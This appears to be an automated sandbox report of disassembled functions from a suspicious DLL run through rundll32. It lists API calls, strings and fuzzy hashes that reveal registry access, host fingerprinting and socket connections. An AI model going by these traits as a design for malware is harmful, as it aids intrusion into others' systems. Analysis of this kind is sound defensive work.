ADVAPI32.dll, xrefs: 04EC4BA7
RegSetValueExA, xrefs: 04EC4BC8
RegCloseKey, xrefs: 04EC4BF3
Time, xrefs: 04EC4B8B
RegOpenKeyExA, xrefs: 04EC4BE9

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressProc$Library$CreateFreeLoadOpenValuelstrlen
String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA$Time
API String ID: 3458221994-4066504548
Opcode ID: 21c1f66887b79f6a88273f93131bc02c9d6695896cb5c86bdc7c851659bf0d39
Instruction ID: b34f41051d0f78e26fec20cddfb6489eae38c33a433c53302fcc59759c787807
Opcode Fuzzy Hash: 21c1f66887b79f6a88273f93131bc02c9d6695896cb5c86bdc7c851659bf0d39
Instruction Fuzzy Hash: 97416B71A00218BBEB14DFA5DD85FEFB7B8EF48700F108619FA14E7291D774A8028B60

Function 6D00C170 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 163
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,93BD9D6B), ref: 6D00C197
WSACleanup.WS2_32 ref: 6D00C1AF
GetModuleHandleA.KERNEL32(kernel32,00000000,00000000), ref: 6D00C1E5
GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6D00C20A
_strpbrk.LIBCMT ref: 6D00C218
LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 6D00C23F
GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 6D00C256
LoadLibraryExA.KERNEL32(iphlpapi.dll,00000000,00000800), ref: 6D00C268
GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6D00C275
GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6D00C296
LoadLibraryA.KERNEL32(00000000), ref: 6D00C2ED
GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 6D00C315
QueryPerformanceFrequency.KERNEL32(6D08B078), ref: 6D00C342

Strings

LoadLibraryExA, xrefs: 6D00C204
iphlpapi.dll, xrefs: 6D00C211, 6D00C22C, 6D00C23A, 6D00C263, 6D00C2C9
if_nametoindex, xrefs: 6D00C30F
AddDllDirectory, xrefs: 6D00C250
pGo, xrefs: 6D00C31B
kernel32, xrefs: 6D00C1DE

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartup_strpbrk
String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32$pGo
API String ID: 596066106-870381569
Opcode ID: feb2002201515f92fc9a59738cbea04dda5a1647d4dbd53e4f6564c80309ad3a
Instruction ID: 3240094a6f10fd7896925b312bf98c2bee92e47904703ae66211ecdba61851b7
Opcode Fuzzy Hash: feb2002201515f92fc9a59738cbea04dda5a1647d4dbd53e4f6564c80309ad3a
Instruction Fuzzy Hash: AC512535148346BBFF215FB58C55B7E36B8AF47704F144228E949AB282EB229406867D

Function 6D036C70 Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 287
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6CFFEEC0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
Part of subcall function 6CFFEEC0: __alldvrm.LIBCMT ref: 6CFFEEED
Part of subcall function 6CFFEEC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14

setsockopt.WS2_32(000000FF,00000006,00000001,?,00000004), ref: 6D036D57
WSAGetLastError.WS2_32(?,00000100), ref: 6D036D6B
getsockopt.WS2_32(?,0000FFFF,00001001,00000004,00000004), ref: 6D036E06
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 6D036E2F
setsockopt.WS2_32(?,0000FFFF,00000008,00000000,00000004), ref: 6D036E67
WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 6D036ED9
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 6D036EE3
closesocket.WS2_32(?), ref: 6D037023

Strings

@, xrefs: 6D036DA1
Could not set TCP_NODELAY: %s, xrefs: 6D036D78
Failed to set SO_KEEPALIVE on fd %d, xrefs: 6D036E72
Trying [%s]:%d..., xrefs: 6D036D00
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 6D036EEB
Trying %s:%d..., xrefs: 6D036D05, 6D036D0D

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: setsockopt$ErrorLast$CounterIoctlPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@closesocketgetsockopt
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
API String ID: 3592965920-1855857570
Opcode ID: 9e7d088e5060f30b19d1d9a9139c4b2862951b9d5a1bb81414f7b8bf75f74f1b
Instruction ID: c5cd88763b7c84418be662ca878b8158aedbe9390b77de88f0a146c31e24499a
Opcode Fuzzy Hash: 9e7d088e5060f30b19d1d9a9139c4b2862951b9d5a1bb81414f7b8bf75f74f1b
Instruction Fuzzy Hash: 2FB1B171908312AFF711CF24CC80FAB77E9AF85308F450529FA989B291D771D648CBA2

Function 6D00C020 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 148
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32,00000000,?,secur32.dll,6D03B80D,secur32.dll,00000004,00000000,00000000,00000002,00000002,6D00C1D4), ref: 6D00C02A
GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6D00C042
_strpbrk.LIBCMT ref: 6D00C054

Strings

LoadLibraryExA, xrefs: 6D00C03C
secur32.dll, xrefs: 6D00C020
AddDllDirectory, xrefs: 6D00C086
kernel32, xrefs: 6D00C023

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc_strpbrk
String ID: AddDllDirectory$LoadLibraryExA$kernel32$secur32.dll
API String ID: 1657965159-2329295995
Opcode ID: 2e74c1dc465142f2b3be6536aad770a83bfe3a47c59b09e158ccf5620552cdec
Instruction ID: a6cae1f38ea3550d16108771c80cdd5b3f4bfaf118861bb73d5390c3d4158d8b
Opcode Fuzzy Hash: 2e74c1dc465142f2b3be6536aad770a83bfe3a47c59b09e158ccf5620552cdec
Instruction Fuzzy Hash: A6311A773083056BFB141F79AC44BBA77B9EF83267F248179E54697242DF23900A8678

Function 04EC7B90 Relevance: 21.1, APIs: 14, Instructions: 136
networkthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04EC7200: setsockopt.WS2_32(?,0000FFFF,00000080,04ECCA88,00000004), ref: 04EC7222
Part of subcall function 04EC7200: CancelIo.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC722F
Part of subcall function 04EC7200: InterlockedExchange.KERNEL32(?,00000000), ref: 04EC723E
Part of subcall function 04EC7200: closesocket.WS2_32(?), ref: 04EC724B
Part of subcall function 04EC7200: SetEvent.KERNEL32(?,?,?,04EC79B2,?), ref: 04EC7258

ResetEvent.KERNEL32(?,762323A0,?,?), ref: 04EC7BB3
socket.WS2_32 ref: 04EC7BC6
gethostbyname.WS2_32(?), ref: 04EC7BED
htons.WS2_32(?), ref: 04EC7C06
inet_ntoa.WS2_32(?), ref: 04EC7C21
_wprintf.LIBCMT ref: 04EC7C29
connect.WS2_32(?,?,00000010), ref: 04EC7C3E
getsockname.WS2_32(?,?,?), ref: 04EC7C6D
_memset.LIBCMT ref: 04EC7C7E
inet_ntoa.WS2_32(?), ref: 04EC7C8A
wsprintfA.USER32 ref: 04EC7C8E
setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 04EC7CB3
WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 04EC7CE8
CreateThread.KERNEL32 ref: 04EC7D03

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Eventinet_ntoasetsockopt$CancelCreateExchangeInterlockedIoctlResetThread_memset_wprintfclosesocketconnectgethostbynamegetsocknamehtonssocketwsprintf
String ID:
API String ID: 628104682-0
Opcode ID: 31430b452370093efa803e9eaed33211a051dc29516eeae7ae7191fe8c71086b
Instruction ID: 5440a69b64031ea77e64c2320c2cf522bf19fb31d181b4753293a6653c06bbeb
Opcode Fuzzy Hash: 31430b452370093efa803e9eaed33211a051dc29516eeae7ae7191fe8c71086b
Instruction Fuzzy Hash: 1D419BB1A00304AFE710DBA8EC85FEAB7B9EF48315F004529F656E7280DB746905CBA1

Function 04EC6880 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 105
sleepthreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB

_memset.LIBCMT ref: 04EC68C6
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,Time), ref: 04EC68DC
_strrchr.LIBCMT ref: 04EC68EB
_strtok.LIBCMT ref: 04EC68F9
wsprintfA.USER32 ref: 04EC6925
CreateThread.KERNEL32(00000000,00000000,04EC6200,00000000,00000000,00000000), ref: 04EC698F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,Time), ref: 04EC6996
_strtok.LIBCMT ref: 04EC69AA
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,Time), ref: 04EC69C1

Strings

ARPD, xrefs: 04EC6894
%s\%s, xrefs: 04EC691F
Time, xrefs: 04EC6893

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$Name_strtokwsprintf$CloseComputerCreateFileHandleModuleSleepThread_strrchrlstrcpy
String ID: %s\%s$ARPD$Time
API String ID: 2842694341-2065597383
Opcode ID: f7eb1adc153925229c31fb4eed8910df0b35926a80a9fe57376e936ba9cf4196
Instruction ID: dd9253770c964d44514236ee174fb53df2edf044c547160d92696feb2513754b
Opcode Fuzzy Hash: f7eb1adc153925229c31fb4eed8910df0b35926a80a9fe57376e936ba9cf4196
Instruction Fuzzy Hash: 07313971940314AFEB10A730DD46FDB77A8DF44705F0451D8EA89AB281DAB4BA46CFE1

Function 6D01F9E0 Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 419
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertFreeCertificateContext.CRYPT32(?), ref: 6D01FEBD

Strings

schannel: next InitializeSecurityContext failed: %s, xrefs: 6D01FF40, 6D01FF83
schannel: %s, xrefs: 6D01FF53
SSL: public key does not match pinned public key, xrefs: 6D01FE6A, 6D01FECB
schannel: unable to re-allocate memory, xrefs: 6D01FABB
SSL: failed retrieving public key from server certificate, xrefs: 6D01FE7E
schannel: failed to send next handshake data: sent %zd of %lu bytes, xrefs: 6D01FD5A
schannel: Failed to read remote certificate context: %s, xrefs: 6D01FEA6
schannel: SNI or certificate check failed: %s, xrefs: 6D01FF6B
schannel: failed to receive handshake, SSL/TLS connection failed, xrefs: 6D01FD11
schannel: unable to allocate memory, xrefs: 6D01FFCB

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CertCertificateContextFree
String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
API String ID: 3080675121-413892695
Opcode ID: fca1959a9b06f4ef97ecdfa88600b0f139dbb02044384d868f9661c006e756d3
Instruction ID: 5da8d36f389f1ed6897fa587fbfba541d72f9653375a62f63ebdc651b8bc6f02
Opcode Fuzzy Hash: fca1959a9b06f4ef97ecdfa88600b0f139dbb02044384d868f9661c006e756d3
Instruction Fuzzy Hash: 39F18CB2908301AFFB10CF58CC84B6A7BE9BF85308F51446CF9599B242D775E948CB92

Function 04EC5070 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 56stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EC5098
GetComputerNameA.KERNEL32(00000000,?), ref: 04EC50B8
lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC50CE
_memset.LIBCMT ref: 04EC50E2
wsprintfA.USER32 ref: 04EC50FA
lstrlenA.KERNEL32(?,00000000), ref: 04EC5106

Strings

UnKnow, xrefs: 04EC50C2
SOFTWARE\%s\, xrefs: 04EC50F4
Time, xrefs: 04EC510E

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$ComputerNamelstrcpylstrlenwsprintf
String ID: SOFTWARE\%s\$Time$UnKnow
API String ID: 3529005902-722125974
Opcode ID: fc0dfc3045c4f6653ec395b53e215e63b179edc94c5a7346951c1d21357a4b23
Instruction ID: 3cd7f212668717ff10c3b91b8852323520ff071aefec51c4d97156dac881d409
Opcode Fuzzy Hash: fc0dfc3045c4f6653ec395b53e215e63b179edc94c5a7346951c1d21357a4b23
Instruction Fuzzy Hash: 071191F1940218AFE724EBA4DD4AFDA737CEF44705F004098E609A6082EA756B55CBA0

Function 04EC5140 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 55stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EC515F
_memset.LIBCMT ref: 04EC5179
GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
_memset.LIBCMT ref: 04EC51C3
wsprintfA.USER32 ref: 04EC51DB

Strings

Enable, xrefs: 04EC51E8
UnKnow, xrefs: 04EC51A3
SOFTWARE\%s\, xrefs: 04EC51D5

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$ComputerNamelstrcpywsprintf
String ID: Enable$SOFTWARE\%s\$UnKnow
API String ID: 1685617284-1753358750
Opcode ID: 98f42faf1801a72113cdb7658114b68778f5985d6daf369cc8498bc76bc398ec
Instruction ID: 84d04d750ff7c636e3a5f66f236081115cf71b5b07c7030f5f33424a46cce23d
Opcode Fuzzy Hash: 98f42faf1801a72113cdb7658114b68778f5985d6daf369cc8498bc76bc398ec
Instruction Fuzzy Hash: 7A11E7F1A80308ABE724EB60DD4AFDA7378DF44704F405499F74476081EA727A55CB90

Function 04EC3BF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringthreadCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000,Time), ref: 04EC3C11
_memset.LIBCMT ref: 04EC3C23
_strtok.LIBCMT ref: 04EC3C34

Part of subcall function 04EB31C7: __getptd.LIBCMT ref: 04EB31E5

_strtok.LIBCMT ref: 04EC3C4F
lstrcpyA.KERNEL32(user,00000000), ref: 04EC3C61
CreateThread.KERNEL32(00000000,00000000,04EB2000,00000000,00000000,00000000), ref: 04EC3C76

Strings

engineer, xrefs: 04EC3C1E, 04EC3C5C, 04EC3C81
Time, xrefs: 04EC3C03

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _strtok$CreateFolderPathSpecialThread__getptd_memsetlstrcpy
String ID: Time$user
API String ID: 3212501827-4045029352
Opcode ID: 978d9a8a5e217a6678e5abb76292fb750cb6fa7cddea536d5de04ca1544e16fa
Instruction ID: ad6dae59a5afdb4da92e253df2421d8c820240c0ec9ef2287d0542ed2917becb
Opcode Fuzzy Hash: 978d9a8a5e217a6678e5abb76292fb750cb6fa7cddea536d5de04ca1544e16fa
Instruction Fuzzy Hash: 23012470B80314BBF634A7689D07FEA3A589F04B06F501198FF84A91C0EAE07A4686F5

Function 6D05A9C8 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D05A669: CreateFileW.KERNEL32(00000000,00000000,?,6D05AA71,?,?,00000000,?,6D05AA71,00000000,0000000C), ref: 6D05A686

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D05AADC
__dosmaperr.LIBCMT ref: 6D05AAE3
GetFileType.KERNEL32(00000000), ref: 6D05AAEF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D05AAF9
__dosmaperr.LIBCMT ref: 6D05AB02
CloseHandle.KERNEL32(00000000), ref: 6D05AB22
CloseHandle.KERNEL32(6D0642E9), ref: 6D05AC6F
GetLastError.KERNEL32 ref: 6D05ACA1
__dosmaperr.LIBCMT ref: 6D05ACA8

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 3da4d02d748d37a1d761957d46c518c58fe4423c420a23994fac38fd56053435
Instruction ID: f28f3a5f21bf7efb4222eb2eb6da1fe1f8574e08d9ad8698dc83b10670db9fa4
Opcode Fuzzy Hash: 3da4d02d748d37a1d761957d46c518c58fe4423c420a23994fac38fd56053435
Instruction Fuzzy Hash: 55A13632A181559FEF098F68D951FAD7BB1AB07324F240159EC11EF2D1C735A822CB61

Function 04EC3EF0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EC3F0C
_memset.LIBCMT ref: 04EC3F1D

Part of subcall function 04EC4D60: _memset.LIBCMT ref: 04EC4DC6
Part of subcall function 04EC4D60: _memset.LIBCMT ref: 04EC4DD9
Part of subcall function 04EC4D60: _memset.LIBCMT ref: 04EC4DEC
Part of subcall function 04EC4D60: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC4DF9
Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04EC4E13
Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04EC4E21
Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 04EC4E2F
Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 04EC4E37
Part of subcall function 04EC4D60: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04EC4E3F
Part of subcall function 04EC4D60: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC4E6C
Part of subcall function 04EC4D60: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC5003

lstrlenA.KERNEL32(00000000), ref: 04EC3F44
lstrcpyA.KERNEL32(04EF8138,UnKnow), ref: 04EC3F5E

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 04EC3F33
UnKnow, xrefs: 04EC3F54
ProcessorNameString, xrefs: 04EC3F26

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressProc_memset$Library$FreeLoadOpenlstrcpylstrlen
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$UnKnow
API String ID: 91903147-1449962935
Opcode ID: ba3f371e4741e4df8f574bddeeccc4be4bd845040c0dc9804d843f2bc799c311
Instruction ID: 84d48924d11298586a802494d5d4d2067253e95e29ef76c5ade5750fd0f06daf
Opcode Fuzzy Hash: ba3f371e4741e4df8f574bddeeccc4be4bd845040c0dc9804d843f2bc799c311
Instruction Fuzzy Hash: A9012670740308ABE714EBE49D03FDD7374AB44B05F105218BA467A1C4DAB47A09CA95

Function 6D048B8E Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6D048BD5
___scrt_uninitialize_crt.LIBCMT ref: 6D048BEF

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 5b2feaf3467d7381ae5252659505078c3e89426dc01f53360d414387c858cbe7
Instruction ID: 93db8cb4483c81670f32b7deede352f5243d0af62b21a3945154fdfac08e3d75
Opcode Fuzzy Hash: 5b2feaf3467d7381ae5252659505078c3e89426dc01f53360d414387c858cbe7
Instruction Fuzzy Hash: 8F41D572D0A619EFFB119FA5CA40FAE7BB4EB857A4F11C93AE91467290C7304D418BD0

Function 6CFFF580 Relevance: 10.6, APIs: 7, Instructions: 78networkCOMMON

Download Yara Rule

APIs

Part of subcall function 6D01C090: getaddrinfo.WS2_32(?,?,?,?), ref: 6D01C0B1

WSAGetLastError.WS2_32 ref: 6CFFF5D1
WSAGetLastError.WS2_32 ref: 6CFFF5D7
EnterCriticalSection.KERNEL32(?), ref: 6CFFF5EE
LeaveCriticalSection.KERNEL32(?), ref: 6CFFF5FC
send.WS2_32(?,?), ref: 6CFFF62B
WSAGetLastError.WS2_32 ref: 6CFFF635
LeaveCriticalSection.KERNEL32(?), ref: 6CFFF643

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CriticalErrorLastSection$Leave$Entergetaddrinfosend
String ID:
API String ID: 1962273317-0
